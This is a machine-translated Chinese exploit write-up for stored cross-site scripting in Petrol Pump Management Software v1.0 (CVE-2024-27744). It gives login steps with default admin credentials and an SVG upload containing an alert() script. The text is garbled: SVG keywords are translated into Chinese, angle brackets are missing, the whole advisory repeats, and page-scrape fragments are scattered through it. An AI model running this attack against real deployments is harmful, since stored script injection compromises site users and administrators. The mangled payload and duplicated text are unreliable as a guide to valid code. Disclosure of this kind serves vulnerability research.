#利用标题:汽油泵管理软件v.1.0-存储的跨站点脚本通过SVG文件
#日期: 01-03-2024
#利用作者: Shubham Pandey
#供应商homepage: https://www.sourcecodester.com
#软件link: https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-free-download.html
#版本: 1.0
#在: Windows,Linux上测试
#CVE : CVE-2024-27744
#描述:汽油泵管理软件中的跨站点脚本漏洞v.1.0允许攻击者通过精心设计的有效载荷执行任意代码。
#POC:
1。在这里我们转到: http://localhost/fuelflow/index.php
2。现在使用默认用户名=[email protected]登录
密码=管理员
3。现在转到'http://localhost/fuelflow/admin/profile.php'
4。将xss.svg文件上传到“图像”字段中
5。存储的XS将在'中存在
6。xss.svg文件的内容在:以下给出
?xml版本='1.0'startalone='no'?
!Doctype SVG Public' - //W3C //DTD SVG 1.1 //en''
svg版本='1.1'基profile='full'xmlns='http://www.w3.org/2000/svg'
polygon ID='三角形'点='0,0 0,50 50,0'填充='#009900'
冲程='#004400'/
脚本类型='text/javascript'
警报('XSS by Shubham Pandey');
/脚本
/svg
#参考:
#日期: 01-03-2024
#利用作者: Shubham Pandey
#供应商homepage: https://www.sourcecodester.com
#软件link: https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-free-download.html
#版本: 1.0
#在: Windows,Linux上测试
#CVE : CVE-2024-27744
#描述:汽油泵管理软件中的跨站点脚本漏洞v.1.0允许攻击者通过精心设计的有效载荷执行任意代码。
#POC:
1。在这里我们转到: http://localhost/fuelflow/index.php
2。现在使用默认用户名=[email protected]登录
密码=管理员
3。现在转到'http://localhost/fuelflow/admin/profile.php'
4。将xss.svg文件上传到“图像”字段中
5。存储的XS将在'中存在
正在加载...
localhost
?xml版本='1.0'startalone='no'?
!Doctype SVG Public' - //W3C //DTD SVG 1.1 //en''
正在加载...
www.w3.org
polygon ID='三角形'点='0,0 0,50 50,0'填充='#009900'
冲程='#004400'/
脚本类型='text/javascript'
警报('XSS by Shubham Pandey');
/脚本
/svg
#参考:
正在加载...
github.com